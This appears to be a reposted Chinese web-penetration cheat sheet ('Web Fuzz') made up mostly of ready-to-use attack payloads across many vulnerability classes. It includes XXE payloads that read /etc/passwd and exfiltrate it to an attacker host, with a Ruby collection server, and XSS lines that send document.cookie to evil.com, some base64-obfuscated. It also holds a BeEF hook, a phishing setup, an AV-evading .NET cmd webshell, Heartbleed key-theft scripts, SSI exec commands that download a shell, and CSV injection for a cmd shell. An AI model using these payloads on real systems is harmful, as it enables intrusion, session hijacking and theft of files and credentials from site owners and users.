内容简介:发现post请求的接口的时候,可以这样试试:如果发现了一个错误:说明能够解析,试试读文件:
发现post请求的接口的时候,可以这样试试:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <methodCall><methodName>&test;</methodName></methodCall>
如果发现了一个错误:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test "nice string bro">] > <methodCall><methodName>&test;</methodName></methodCall>
说明能够解析,试试读文件:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&test;</methodName></methodCall>
或者用 php 伪协议:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">] > <methodCall><methodName>&test;</methodName></methodCall>
得到的结果再base64解码即可。
webgoat8
测试方法
试一试是否可以添加实体的评论:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <comment><text>&test;</text></comment>
可以的话,试试file:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test SYSTEM "file:///etc/passwd"> ]> <comment><text>&test;</text></comment>
MUTILLIDAE
要获取mutillidae上的文件,要在form表单提交的过程中使用测试的payload:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>
或者把xml版本忽略掉:
<!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>
以及上面提到的php流:
<!DOCTYPE a [<!ENTITY TEST SYSTEM "php://filter/convert.base64-encode/resource=phpinfo.php">] > <methodCall><methodName>&TEST;</methodName></methodCall>
OUT OF BAND
基础测试
copy the payload to clipboard
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://burp.collab.server" >]><foo>&xxe;</foo>
看看是否发送了请求
成功后,再利用其他payload
读文件
wing.xml
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/lsb-release"> <!ENTITY % dtd SYSTEM "http://<evil attacker hostname>:8000/evil.dtd"> %dtd; ]> <data>&send;</data>
vps->evil.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<evil attacker hostname>:8000/?collect=%file;'>"> %all;
host in dtd:
python -m SimpleHTTPServer 8000
使用FTP读文件
evil.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd"> %asd; %c; ]> <a>&rrr;</a>
将dtd文件放在VPS上:
<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://<evil attacker hostname>:2121/%d;'>">
ruby利用脚本:
require 'socket'
ftp_server = TCPServer.new 2121
http_server = TCPServer.new 8088
log = File.open( "xxe-ftp.log", "a")
payload = '<!ENTITY % asd SYSTEM "file:///etc/passwd">'
Thread.start do
loop do
Thread.start(http_server.accept) do |http_client|
puts "HTTP. New client connected"
loop {
req = http_client.gets()
break if req.nil?
if req.start_with? "GET"
http_client.puts("HTTP/1.1 200 OK\r\nContent-length: #{payload.length}\r\n\r\n#{payload}")
end
puts req
}
puts "HTTP. Connection closed"
end
end
end
Thread.start do
loop do
Thread.start(ftp_server.accept) do |ftp_client|
puts "FTP. New client connected"
ftp_client.puts("220 xxe-ftp-server")
loop {
req = ftp_client.gets()
break if req.nil?
puts "< "+req
log.write "get req: #{req.inspect}\n"
if req.include? "LIST"
ftp_client.puts("drwxrwxrwx 1 owner group 1 Feb 21 04:37 test")
ftp_client.puts("150 Opening BINARY mode data connection for /bin/ls")
ftp_client.puts("226 Transfer complete.")
elsif req.include? "USER"
ftp_client.puts("331 password please - version check")
elsif req.include? "PORT"
puts "! PORT received"
puts "> 200 PORT command ok"
ftp_client.puts("200 PORT command ok")
else
puts "> 230 more data please!"
ftp_client.puts("230 more data please!")
end
}
puts "FTP. Connection closed"
end
end
end
loop do
sleep(10000)
end
fuzz
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XXE-Fuzzing.txt
XSS
对于asp的站点,我们用unicode编码尖括号,适用于存储型XSS:
'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'
文件上传的XSS
发现上传点的时候,可以试试用payload作为文件名:
<img src=x onerror=alert('XSS')>.png
or:
"><img src=x onerror=alert('XSS')>.png
or:
"><svg onmouseover=alert(1)>.svg
SVG
stuff.svg
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS!');
</script>
</svg>
XML
<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html>
CSP BYPASS
script-src self: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
常用的payload
-
svg/onload -
'-alert(1)-' -
eval(atob('YWxlcnQoMSk=')) -
<iMg SrC=x OnErRoR=alert(1)> -
<div onmouseover="alert('XSS');">
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> -
- ```""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")() -
oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e
AUTH CRED
遇到http-only的时候:
使用钓鱼的基本身份验证获取其凭据
- 注册一个和目标类似的域名
- https://github.com/ryhanson/phishery
- 编译然后运行
- 设置payload—-
<img/src/onerror=document.location="https://evil.com/"> - 等待目标上线
可还行
偷Cookie
<img/src/onerror=document.location="http://evil.com:8090/cookiez.php?c="+document.cookie>
Blacklist bypass:
过滤了 //,:,",<和>
btoa('document.location="http://evil.com:8090/r.php?c="+document.cookie')
payload:
eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))
另外一个:
<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>
比较不错的一个payload:
<svg onload=fetch("//attacker/r.php?="%2Bcookie)>
nc 监听:
nc -lvp 8090
测试session劫持
利用burp重放功能进行测试。
看不同cookie会有什么变化。
FILTER BYPASS RESOURCES
收集到的payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://bittherapy.net/a-trick-to-bypass-an-xss-filter-and-execute-javascript/ https://support.portswigger.net/customer/portal/articles/2590820-bypassing-signature-based-xss-filters-modifying-script-code https://brutelogic.com.br/blog/avoiding-xss-detection/ https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec
基于POST的XSS
如果遇到无法将基于POST的XSS转换为GET请求的情况(可能目标服务器上禁用了GET请求),试试CSRF。
DOM XSS
<target.com>/#<img/src/onerror=alert("XSS")>
beef的hook,urlencode
<target.com>/#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))>
#<img/src="1"/onerror=alert(1)>
#><img src=x onerror=prompt(1);>
这些站点有大量的xss payload
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection https://zseano.com/tutorials/4.html https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html http://www.xss-payloads.com/payloads-list.html?a#category=all
payload生成:
xssor.io http://www.jsfuck.com/ https://github.com/aemkei/jsfuck https://convert.town/ascii-to-text http://jdstiles.com/java/cct.html
SSRF
在可以控制url参数的情况下,只要不重定向,就可以测试一下SSRF。
Webhooks, PDF 生成, 文档解析, 文件上传这些地方都可以重点关注一下。
PS: https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
想办法探测内网资产: http://internal-server:22/notarealfile.txt
更换端口,查看回显,判断端口的开放。
没有回显的情况下,按照响应时间判断,以及DNSLOG,这玩意burp自带的也好用的。
根据我的经验,一些组件只能使用某些端口,例如80,8080,443等。最好对这些端口进行测试。
如果你的payload中有路径,最好带上&,#
http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000& http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000#
这篇文章对SOP和CORS以及SSRF都有很好的讲解:https//www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/
Bug Bounty Write-ups:
https://hackerone.com/reports/115748 https://hackerone.com/reports/301924 https://www.sxcurity.pro/hackertarget/ http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf https://github.com/ngalongc/bug-bounty-reference#server-side-request-forgery-ssrf https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/
SQL注入
使用SQLMap在PUT REST Params中测试SQLi:
1. 使用 *标记Vulnerable参数 2. 复制请求并将其粘贴到文件中。 3. 用sqlmap运行: sqlmap -r <file with request> -vvvv
备忘录: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
可以试试双编码输入。
会话固定
快速检查的方法,可用于确定会话固定漏洞是否是网站上的问题:
转到登录页面,观察未经身份验证的用户拥有的会话ID。 登录该站点。进入后,观察用户拥有的会话ID。如果会话ID与用户进行身份验证之前由站点提供的会话ID匹配,那么存在会话固定漏洞。
CSRF
一些绕过技术,即使有CSRF Token:
https://zseano.com/tutorials/5.htmlcsrf和reset api:
<html>
<script>
function jsonreq() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST","https://target.com/api/endpoint", true);
xmlhttp.setRequestHeader("Content-Type","text/plain");
//xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.withCredentials = true;
xmlhttp.send(JSON.stringify({"test":"x"}));
}
jsonreq();
</script>
</html>
案例:
https://blog.appsecco.com/exploiting-csrf-on-json-endpoints-with-flash-and-redirects-681d4ad6b31b http://c0rni3sm.blogspot.com/2018/01/1800-in-less-than-hour.html
CSRF TO REDECT XSS
<html>
<body>
<p>Please wait... ;)</p>
<script>
let host = 'http://target.com'
let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e'
let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E'
function submitRequest() {
var req = new XMLHttpRequest();
req.open(<CSRF components, which can easily be copied from Burp's POC generator>);
req.setRequestHeader("Accept", "*\/*");
req.withCredentials = true;
req.onreadystatechange = function () {
if (req.readyState === 4) {
executeXSS();
}
}
req.send();
}
function executeXSS() {
window.location.assign(host+'<URI with XSS>'+alert_payload);
}
submitRequest();
</script>
</body>
</html>
文件上传漏洞
在OS X上创建测试10g文件(对于测试文件上载限制很有用):
mkfile -n 10g temp_10GB_file
无限制的文件上传
资源:
http://nileshkumar83.blogspot.com/2017/01/file-upload-through-null-byte-injection.html
一些备忘录: https://github.com/jhaddix/tbhm
CORS配置错误
用于测试的POC:
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText;
// If you want to print something out after it finishes:
//alert(req.getAllResponseHeaders());
//alert(localStorage.access_token);
}
};
// If you need to set a header (you probably won't):
// req.setRequestHeader("header name", "value");
req.open("GET", "<site>", true);
req.withCredentials = true;
req.send();
}
</script>
</body>
</html>
资源:
https://www.securityninja.io/understanding-cross-origin-resource-sharing-cors/ http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html https://www.youtube.com/watch?v=wgkj4ZgxI4c http://ejj.io/misconfigured-cors/ https://www.youtube.com/watch?v=lg31RYYG-T4 https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS https://w3c.github.io/webappsec-cors-for-developers/#cors http://gerionsecurity.com/2013/11/cors-attack-scenarios/ Using CORS misconfiguration to steal a CSRF Token: https://yassineaboukir.com/blog/security-impact-of-a-misconfigured-cors-implementation/
测试心脏出血漏洞
nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d
偷私钥
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py echo "<target>:<port>" > targets.txt python heartbleed.py -f targets.txt -v -e
wget https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py python heartbleed-poc.py <target> -p <target port> | less
https://gist.github.com/bonsaiviking/10402038
https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py重定向
http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.html
重定向到beef:
<script> s=document.createElement('script'); s.type='text/javascript'; s.src='http://evil.com:3000/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>
使用Burp中的Decoder将其编码为base-64,并将其传递给payload:
data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==
other:
http://;URL=javascript:alert('XSS')
data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect
CRLF注入
当你看到请求的参数是这样:
http://inj.example.org/redirect.asp?origin=foo
回显是这样:
HTTP/1.1 302 Object moved Date: Mon, 07 Mar 2016 17:42:46 GMT Location: account.asp?origin=foo Connection: close Content-Length: 121 <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
尝试CRLF注射:
http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a
CRLF: %0d%0a
https://www.gracefulsecurity.com/http-header-injection/ https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) https://www.acunetix.com/websitesecurity/crlf-injection/ https://blog.innerht.ml/twitter-crlf-injection/
模板注入
您可以将一些代码放入jsfiddle以进行payload测试:
<html>
<head>
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script>
</head>
<body>
<div ng-app>
{{constructor.constructor('alert(1)')()}}
</div>
</body>
</html>
http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
RCE
使用WEBSHELL上传(.NET)绕过AV:
这是一个示例,其中包含fuzzdb项目中的一个webshell:
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string executeIt(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdClick(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(executeIt(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>REALLY NICE</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
https://hax365.wordpress.com/2015/12/15/easy-trick-to-upload-a-web-shell-and-bypass-av-products/
PHP中的匿名函数RCE
$inputFunc = function() use($a, $b, $c, &$f){echo(exec('whoami'));};
PHP实验
如果您需要测试一些PHP代码,可以使用本机Web服务器来托管它:
php -S 127.0.0.1:80 -t .
PHP交互式SHELL
php -a
CSV注入
在Windows上的Excel中,输入以下内容以获取cmd shell:
=cmd|'cmd'!''
exmaple: https://rhinosecuritylabs.com/azure/cloud-security-risks-part-1-azure-csv-injection-vulnerability/
movie: https://www.youtube.com/watch?v=SC7AkclnG2g
有用的脚本
不断检查网站服务是否关闭:
while true; do /usr/bin/wget "http://[target]/uri/path" --timeout 30 -O - 2>/dev/null | grep "[item on page]" || echo "The site is down"; sleep 10; done
IDORS
服务器端包含注入
把它放在一个易受攻击的参数中:
如果有效,您应该在响应中看到当前日期和时间输出。
<!--#printenv --> :输出环境变量。
<!--#exec cmd="cat /etc/passwd"-->
more:
<pre><!--#exec cmd="ls" --></pre> <pre><!--#echo var="DATE_LOCAL" --> </pre> <pre><!--#exec cmd="whoami"--></pre> <pre><!--#exec cmd="dir" --></pre> <!--#exec cmd="ls" --> <!--#exec cmd="wget http://website.com/dir/shell.txt" --> <!--#exec cmd="/bin/ls /" --> <!--#exec cmd="dir" --> <!--#exec cmd="cd C:\WINDOWS\System32"> <!--#config errmsg="File not found, informs users and password"--> <!--#echo var="DOCUMENT_NAME" --> <!--#echo var="DOCUMENT_URI" --> <!--#config timefmt="A %B %d %Y %r"--> <!--#fsize file="ssi.shtml" --> <!--#include file=?UUUUUUUU...UU?--> <!--#echo var="DATE_LOCAL" --> <!--#exec cmd="whoami"--> <!--#printenv --> <!--#flastmod virtual="echo.html" --> <!--#echo var="auth_type" --> <!--#echo var="http_referer" --> <!--#echo var="content_length" --> <!--#echo var="content_type" --> <!--#echo var="http_accept_encoding" --> <!--#echo var="forwarded" --> <!--#echo var="document_uri" --> <!--#echo var="date_gmt" --> <!--#echo var="date_local" --> <!--#echo var="document_name" --> <!--#echo var="document_root" --> <!--#echo var="from" --> <!--#echo var="gateway_interface" --> <!--#echo var="http_accept" --> <!--#echo var="http_accept_charset" --> <!--#echo var="http_accept_language" --> <!--#echo var="http_connection" --> <!--#echo var="http_cookie" --> <!--#echo var="http_form" --> <!--#echo var="http_host" --> <!--#echo var="user_name" --> <!--#echo var="unique_id" --> <!--#echo var="tz" --> <!--#echo var="total_hits" --> <!--#echo var="server_software" --> <!--#echo var="server_protocol" --> <!--#echo var="server_port" --> <!--#echo var="server_name --> <!--#echo var="server_addr" --> <!--#echo var="server_admin" --> <!--#echo var="script_url" --> <!--#echo var="script_uri" --> <!--#echo var="script_name" --> <!--#echo var="script_filename" --> <!--#echo var="netsite_root" --> <!--#echo var="site_htmlroot" --> <!--#echo var="path_translated" --> <!--#echo var="path_info_translated" --> <!--#echo var="request_uri" --> <!--#echo var="request_method" --> <!--#echo var="remote_user" --> <!--#echo var="remote_addr" --> <!--#echo var="http_client_ip" --> <!--#echo var="remote_port" --> <!--#echo var="remote_ident" --> <!--#echo var="remote_host" --> <!--#echo var="query_string_unescaped" --> <!--#echo var="query_string" --> <!--#echo var="path_translated" --> <!--#echo var="path_info" --> <!--#echo var="path" --> <!--#echo var="page_count" --> <!--#echo var="last_modified" --> <!--#echo var="http_user_agent" --> <!--#echo var="http_ua_os" --> <!--#echo var="http_ua_cpu" -->
点击劫持
只需使用Burp的clickbandit。还要记住:Clickjacking适用于点击,而不适用于键盘。
poc:
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="http://target.com" width="500" height="500"></iframe>
</body>
</html>
https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009 )
https://javascript.info/clickjacking
https://www.tinfoilsecurity.com/blog/what-is-clickjacking攻击JSON
利用burp标记参数进行主动扫描
反序列化漏洞
Writeup on Oracle Weblogic CVE-2018-2628
Java Deserialization Scanner Burp Extension
Java Serialized Payloads Burp Extension工具
测试不安全的JWT
获取JSON Web Tokens Burp扩展 捕获请求,将其发送到Repeater 单击JSON Web Tokens选项卡 单击使用随机密钥对签名 单击Alg None Attack下的下拉菜单 单击Go 查看会话后是否仍然有效
以上所述就是小编给大家介绍的《Web Fuzz》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Essential C++中文版
李普曼 (Stanley B.Lippman) / 侯捷 / 电子工业出版社 / 2013-8-1 / CNY 65.00
本书以四个面向来表现C++的本质:procedural(面向过程的)、generic(泛型的)、object-based(基于对象的)、objectoriented(面向对象的)。全书围绕一系列逐渐繁复的程序问题,以及用以解决这些问题的语言特性来组织。循此方式,你将不只学到C++的功能和结构,也可学到它们的设计目的和基本原理。 本书适合那些已经开始从事软件设计,又抽不出太多时间学习新技术的程......一起来看看 《Essential C++中文版》 这本书的介绍吧!
